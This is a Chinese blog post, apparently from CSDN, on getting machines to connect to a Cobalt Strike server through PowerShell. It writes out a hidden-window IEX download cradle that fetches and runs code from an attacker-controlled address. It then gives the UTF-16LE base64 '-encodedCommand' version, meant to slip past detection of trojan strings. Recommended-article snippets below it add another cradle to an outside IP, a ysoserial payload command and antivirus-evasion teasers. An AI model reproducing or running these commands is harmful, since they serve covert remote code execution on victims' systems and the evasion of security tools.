powershell cs-UTF-16LE编码上线

最新推荐文章于 2024-02-25 20:42:36 发布
最新推荐文章于 2024-02-25 20:42:36 发布
阅读量761 收藏
点赞数
分类专栏: 内网渗透 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42109829/article/details/125611227
版权

0x01前言

当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线

0x02问题

1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=

在这里插入图片描述

2、原句子
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"

3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
在这里插入图片描述
主机上线
在这里插入图片描述

如何利用PowerShell完成的Windows服务器系统安全加固实践和基线检测
WeiyiGeek 唯一极客IT知识分享
04-11 5203
0x00 前言简述 最近单位在做等保测评,由本人从事安全运维方面的工作(PS:曾经做过等保等方面的安全服务),所以自然而然的与信安的测评人员起对接相关业务系统的检查,在做主机系统测评检查时发现了系统中某些配置不符合等保要求,需要对不满足要求的主机做进步整改,好在我们众多的系统基本都是运行在虚拟机上搭建的kubernetes集群中,这样来就可以尽可能减少加固系统给应用带来的影响,我们可以台加固更新。 在这样环境的驱动下不得不将通宵熬夜,我准备好了枸杞和保温杯,当然也把测试环境也准备了套,并将以前
[系统安全] 六十二.恶意软件分析 (13)LLM赋能实现基于机器学习的恶意家族分类(初探)
杨秀璋的专栏
02-02 1128
前文探索了利用大模型辅助恶意代码分析,即LLM赋能Lark工具提取XLM代码的抽象语法树。这篇文章将继续尝试探索利用大模型辅助恶意代码分析,尝试进行恶意代码家族分类实验。在恶意代码分析过程中,大家会遇到各种各样的问题,如何结合LLM和GPT完成复杂任务,更好地为安全工程师合作至关重要。基础性探索文章,还请各位大佬多多指教,写得不足的地方还请海涵。希望您喜欢,且看且珍惜。
PowerShell输出字符串的编码UTF-16LE的问题
从零开始
12-01 2312
使用powershell时遇到csv不分列的问题 修改powershell输出格式 修改执行策略
powershell 中文系统默认UTF-16 (LE) UNICODE编码 使用时需小心
arthur2612的博客
05-08 783
现象: 1.cmd生成payload java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload.bin 2.powershell生成payload java -jar ysoserial.jar Groovy1 ...
cs通过生成Payload上线Powershell的两种上线方式)
久恙502的博客
01-14 1422
两种模式下的不同上线方法
CS通过(CDN+证书)powershell上线详细版
qq_50854662的博客
06-01 1461
cdn
使用powershell免杀上线CS的新方式---利用图片
Shanfenglan's blog
04-06 6150
文章目录利用工具模拟上线参考文章 利用工具 Invoke-PSImage 任意张图片 模拟上线 参考文章 Shellcode隐写到预期RGB免杀上线到CobaltStrike
使用powershell提权的些技巧
weixin_34392435的博客
06-21 1万+
原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 然后是个小技巧: ...
中文乱码无处遁形:ISE与Notepad++编码设置比较及终极解决方案
ISE与Notepad++编码设置比较及终极解决方案](https://img-blog.csdnimg.cn/20190725210915632.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2...
Potato提权小结
wo41ge的博客
11-11 2万+
前言 当我们拿到webshell 却苦于无法提权 早之前有巴西烤肉提权,有pr提权 今天 来个土豆提权合集 妈妈再也不担心我的webshell无法提权了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地权限提升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
CobaltStrike 使用教程(二)之powershell上线
m0_53087192的博客
03-10 6440
使用powershell上线 方法 选择生成payload,选择如图。 复制文档里的内容,粘贴进cmd,并运行。 成功上线 方法二 选择生成payload,选择如图。 将生成的payload.ps1上传的要上线的机器上,cmd运行 powershell -file payload.ps1 ps:有时会有以下提示 cmd运行 powershell set-ExecutionPolicy RemoteSigned 在运行,成功上线 powershell -file payload.ps1
红队攻防之powershell上线基础免杀()
平凡
02-25 708
不努力,你背井离乡干嘛?当卧底啊
Metasploit - Powershell
Nixawk
11-16 1420
msf post(multi_meterpreter_inject) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ----------
Apache Flink (最新版本) 远程代码执行
平凡
05-04 961
路虽远,行则将至;事虽难,做则必成
powershell cs上线_红队CS工具的基本使用
weixin_39976382的博客
10-21 1268
简介:Cobalt Strike 款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。还可以进行钓鱼攻击包括:网站克隆、目标信息获取、java执行、浏览器攻击等CS主要用于团体协作,可以让多个攻击者同时连接到团体服务器,共享信息。环境搭建:CS分为客户端和服务端,其中服务端只能运行在Linux系统...
不用powershell执行powershell脚本与xsl文件不落地上线
热门推荐
Shanfenglan's blog
09-14 17万+
CATALOG前言powershell的本质小试牛刀 前言 前几天在学习windows命名管道的时候偶然看到篇文章: we don’t neet powershell.exe 作者提供了种特殊的运行powershell脚本的方式,这种方式既有趣又实用,是通过c#来实现的,因此这也坚定了我学习c#的步伐。 powershell的本质 我们都知道powershell个exe程序,它可以执行自己的命令或者powershell脚本。其实powershell的本质就是解释器,类似于python。python
cs powershell无文件落地利用
课嗨教育的专栏
04-18 1818
目录 、写入程序 二、cs powershell添加重启上线 三、应用程序添加重启上线 、写入程序 cs powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))" 以易语言为例: 运行 (“powershell.exe -nop -w hidden -c ” + #引号 + “IEX ((new-
免杀-PowerShell
weixin_58782362的博客
11-20 885
win自带defender杀毒工具,所以defender和powershell用的同种语言,很容易被查杀,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
utf-16le编码转换utf-8
最新发布
03-08
### 将UTF-16LE编码的文本转换为UTF-8编码 为了实现从UTF-16LEUTF-8的转换,可以采用多种编程语言和工具来完成这操作。以下是几种常见方法: #### 使用Python进行转换 Python提供了强大的内置函数用于处理不同类型的字符编码。通过`open()`函数指定源文件的编码格式以及目标文件所需的编码格式即可轻松完成转换。 ```python with open('source_file.txt', 'r', encoding='utf-16le') as f_in, \ open('output_file.txt', 'w', encoding='utf-8') as f_out: content = f_in.read() f_out.write(content) ``` 这段代码读取了个名为`source_file.txt`的UTF-16LE编码文件,并将其内容写入个新的UTF-8编码文件`output_file.txt`中[^2]。 #### 利用iconv命令行工具 对于熟悉Linux或类Unix系统的用户来说,`iconv`是个非常实用的命令行工具,专门用来解决各种字符集之间的转换问题。下面是条简单的指令,能够把输入流中的UTF-16LE数据转码成UTF-8并输出至标准输出设备或者保存到新创建的目标文件里。 ```bash iconv -f utf-16le -t utf-8 source_file.txt > output_file.txt ``` 此命令将`source_file.txt`的内容由UTF-16LE转换为UTF-8后重定向存储于`output_file.txt`内[^5]。 #### PowerShell脚本方式 如果是在Windows环境下工作,则可以通过编写PowerShell脚本来达到相同的效果。考虑到默认情况下PowerShell可能不会按照预期的方式处理某些特殊字符,在执行之前建议先调整好环境变量以确保正确的编码行为。 ```powershell $PSDefaultParameterValues['Out-File:Encoding'] = 'utf8' Get-Content .\source_file.txt | Set-Content -Path .\output_file.txt -NoNewline ``` 上述脚本同样实现了将本地磁盘上的UTF-16LE编码文档转变为UTF-8版本的功能[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值